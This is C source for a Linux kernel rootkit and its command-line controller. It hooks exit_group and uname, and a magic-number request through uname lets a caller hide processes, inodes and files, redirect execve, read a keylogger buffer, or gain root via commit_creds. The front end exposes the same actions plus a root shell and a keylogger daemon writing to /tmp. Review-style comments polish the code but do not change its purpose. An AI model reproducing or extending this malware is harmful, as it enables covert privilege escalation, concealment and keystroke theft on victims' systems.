/*
 * Hook for exit_group(2).
 *
 * If the calling process is on the hidden-PID list, remove it before the
 * process goes away so the list does not keep a stale entry; then hand the
 * call to the original sys_exit_group, which does not return.
 */
asmlinkage void new_sys_exit_group(int error_code)
{
	pid_t self = ksyms.old_sys_getpid();

	/* Nothing to clean up for a visible process. */
	if (!is_pid_hidden_no_getpid(self))
		goto passthrough;

	unhide_pid(self);

passthrough:
	ksyms.old_sys_exit_group(error_code);
}
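/*
 * Command handler for un-hiding a process.
 *
 * argv[0] must hold a decimal, non-negative PID; argc is not consulted
 * beyond being part of the handler signature.
 *
 * Returns 1 if the argument is not a valid PID, otherwise whatever
 * unhide_pid() returns.
 */
static	int do_unhide_pid(int argc, char **argv)
{
	int	pid;
	char	trailing;

	(void)argc;

	/* "%d" matches the int target (the old "%u" was a format/type
	 * mismatch); the extra "%c" only matches if there is trailing text,
	 * so "12abc" and "12 " are rejected instead of silently truncated. */
	if (sscanf(argv[0], "%d%c", &pid, &trailing) != 1 || pid < 0) {
		/* Report the text we were given; the old message printed
		 * `pid`, which is uninitialised on a failed parse. */
		eprintf("Invalid pid '%s'\n", argv[0]);
		return 1;
	}
	return unhide_pid(pid);
}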
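/*
 * Rootkit control interface, hooked over uname(2).
 *
 * A caller that passes a struct rk_args (rather than a real utsname buffer)
 * whose two magic fields match MAGIC_NUMBER_1/MAGIC_NUMBER_2 gets args.mode
 * dispatched to the matching hide/unhide/root/redirect/keylogger handler.
 * Everything else is forwarded to the original sys_uname untouched.
 *
 * Security note: the two magic constants are the only gate; any local
 * caller that knows them reaches GET_ROOT, which commits a fresh kernel
 * credential with no further check.
 *
 * Returns 0 after handling a command, keylogger_buffer_get()'s result for
 * SYSCALL_GET_KEYLOGGER_BUF, or the original syscall's return value when
 * the request is not a control request.
 */
asmlinkage long new_sys_newuname(struct new_utsname *name)
{
	struct rk_args args;

	/* sizeof(args) bytes are read from the caller's pointer. If that copy
	 * fails, args is uninitialised; the old code logged the failure but
	 * still compared the magic fields. Treat it as a plain uname() call. */
	if (ksyms._copy_from_user(&args, name, sizeof(args))) {
		pr_debug("%s: _copy_from_user failed\n", __func__);
		return ksyms.old_sys_uname(name);
	}

	if (args.magic_number_1 != MAGIC_NUMBER_1 || args.magic_number_2 != MAGIC_NUMBER_2)
		return ksyms.old_sys_uname(name);

	pr_debug("%s: magic number reveived\n", __func__);

	switch (args.mode) {
	case SYSCALL_HIDE_INODE:
		hide_inode(args.param1);
		break;
	case SYSCALL_UNHIDE_INODE:
		unhide_inode(args.param1);
		break;
	case GET_ROOT:
		/* Both symbols are resolved at load time and may be missing. */
		if (ksyms.commit_creds && ksyms.prepare_kernel_cred)
			ksyms.commit_creds(ksyms.prepare_kernel_cred(NULL));
		break;
	case SYSCALL_HIDE_PID:
		hide_pid(args.param1);
		break;
	case SYSCALL_UNHIDE_PID:
		unhide_pid(args.param1);
		break;
	case VFS_HIDE_FILE:
		vfs_hide_filename(args.p_param1, args.param2);
		break;
	case VFS_UNHIDE_FILE:
		vfs_unhide_filename(args.p_param1, args.param2);
		break;
	case SYSCALL_REDIRECT_EXECVE:
		redirect_path(args.p_param1, args.param2,
				args.p_param3, args.param4, REDIRECT_PATH_EXECVE);
		break;
	case SYSCALL_UNREDIRECT_EXECVE:
		unredirect_path(args.p_param1, args.param2, REDIRECT_PATH_EXECVE);
		break;
	case SYSCALL_GET_KEYLOGGER_BUF:
		/* Only command whose result is returned to the caller. */
		return keylogger_buffer_get(args.p_param1, args.param2);
#ifdef DEBUG
	case DEBUG_RK:
		debug_rk();
		break;
#endif
	default:
		/* Unknown mode with valid magic: ignore it silently. */
		break;
	}

	return 0;
}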
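/*
 * Parse a decimal integer option argument into *out.
 *
 * Replaces atoi(), which silently turns "abc" into 0 and gives no
 * indication of overflow. Returns 0 on success, -1 if the text is empty,
 * has trailing characters, or does not fit in an int.
 */
static int parse_int_arg(const char *text, int *out)
{
	char *end = NULL;
	long value;

	if (text == NULL || *text == '\0')
		return -1;

	value = strtol(text, &end, 10);
	/* Whole string must be consumed and the value must round-trip
	 * through int (catches out-of-range values without errno). */
	if (*end != '\0' || (long)(int)value != value)
		return -1;

	*out = (int)value;
	return 0;
}

/*
 * Command-line front end for the rootkit control interface.
 *
 * Each long option (indexed 0..13 via long_options' val) maps to one
 * control action. Numeric options are validated before dispatch; on a
 * malformed number the usage text is printed and the program exits 1.
 * Returns 0 after all options have been processed.
 */
int main(int argc, char **argv)
{
	int c, opt_idx, num = 0;

	for (;;) {
		c = getopt_long(argc, argv, "h", long_options, &opt_idx);
		if (c == -1)
			break;

		/* Options 0, 1, 5 and 6 take an inode or PID number. */
		if (c == 0 || c == 1 || c == 5 || c == 6) {
			if (parse_int_arg(optarg, &num) != 0) {
				usage(argv[0]);
				return 1;
			}
		}

		switch (c) {
		case 'h':
			usage(argv[0]);
			return 0;
		case 0:
			hide_inode(num);
			break;
		case 1:
			unhide_inode(num);
			break;
		case 2:
			root_shell();
			break;
		case 3:
			hide_file(optarg);
			break;
		case 4:
			unhide_file(optarg);
			break;
		case 5:
			hide_pid(num);
			break;
		case 6:
			unhide_pid(num);
			break;
		case 7:
			hide_filename(optarg);
			break;
		case 8:
			unhide_filename(optarg);
			break;
		case 9:
			redirect_execve(optarg);
			break;
		case 10:
			unredirect_execve(optarg);
			break;
		case 11:
			get_keylogger_buf(optarg);
			break;
		case 12:
			/* Fixed path in a world-writable directory: a pre-placed
			 * symlink there could redirect whatever the daemon writes.
			 * NOTE(review): confirm how anima_daemon opens this path. */
			anima_daemon("/tmp/keylogger");
			break;
		case 13:
			anima_control(DEBUG_RK, NULL);
			break;
		default:
			/* getopt_long already reported unknown options. */
			break;
		}
	}

	return 0;
}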